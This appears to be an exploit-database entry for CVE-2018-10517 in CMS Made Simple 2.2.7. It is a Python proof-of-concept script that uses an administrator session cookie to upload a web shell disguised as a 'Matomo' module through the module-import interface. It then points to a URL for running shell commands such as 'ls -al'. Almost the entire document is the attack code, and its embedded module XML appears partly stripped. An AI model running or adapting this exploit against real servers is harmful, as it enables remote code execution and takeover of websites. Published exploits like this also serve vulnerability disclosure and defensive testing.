CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution

Lucian Ioan Nitescu 2018-11-06 webapps php
# Exploit Title: CMS Made Simple 2.2.7 - Remote Code Execution
# Date: 2018-11-04
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Webiste: https://nitesculucian.github.io
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
# Version: 2.2.7
# Tested on: Ubuntu 18.04
# CVE: CVE-2018-10517

# 1. Description: 
# An attacker or a malicious user with access to the administration interface can execute code on the server.

# 2. Proof of Concept:

import requests

# target configuration (required admin credentials in order to obtain a valid session)

target_url=""
session_cookie = ""
session_value = ""

# upload of shell unde the name of Matomo plugin

burp0_url = target_url + "/admin/moduleinterface.php"

burp0_cookies = {session_cookie: session_value}
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://gk1v1ml3nfrd1bs00o69fmwnh.public2.attackdefenselabs.com/", "Content-Type": "multipart/form-data; boundary=---------------------------207726338310671742711263591267", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
burp0_data="-----------------------------207726338310671742711263591267\r\nContent-Disposition: form-data; name=\"mact\"\r\n\r\nModuleManager,m1_,local_import,0\r\n-----------------------------207726338310671742711263591267\r\nContent-Disposition: form-data; name=\"__c\"\r\n\r\n9a63802b6c4579cc01c\r\n-----------------------------207726338310671742711263591267\r\nContent-Disposition: form-data; name=\"m1_upload\"; filename=\"test.xml\"\r\nContent-Type: text/xml\r\n\r\n\n    1.3\n    Matomo\n    0.0.1\n    2.1.5\n    \n    \n    \n    \n      /\n      1\n    \n    \n      /action.admin_settings.php\n      0\n      \n    \n    \n      /action.admin_statistics.php\n      0\n      \n    \n    \n      /action.default.php\n      0\n      \n    \n    \n      /action.savesettings.php\n      0\n      \n    \n    \n      /lang/\n      1\n    \n    \n      /lang/en_US.php\n      0\n      \n    \n    \n      /Matomo.module.php\n      0\n      \n    \n    \n      /moduleinfo.ini\n      0\n      \n    \n    \n      /templates/\n      1\n    \n    \n      /templates/adminsettings.tpl\n      0\n      \n    \n\r\n-----------------------------207726338310671742711263591267--\r\n"
requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)

print "Try to access your web shell at: " + target_url + "/modules/Matomo/action.admin_settings.php?cmd=ls%20-al"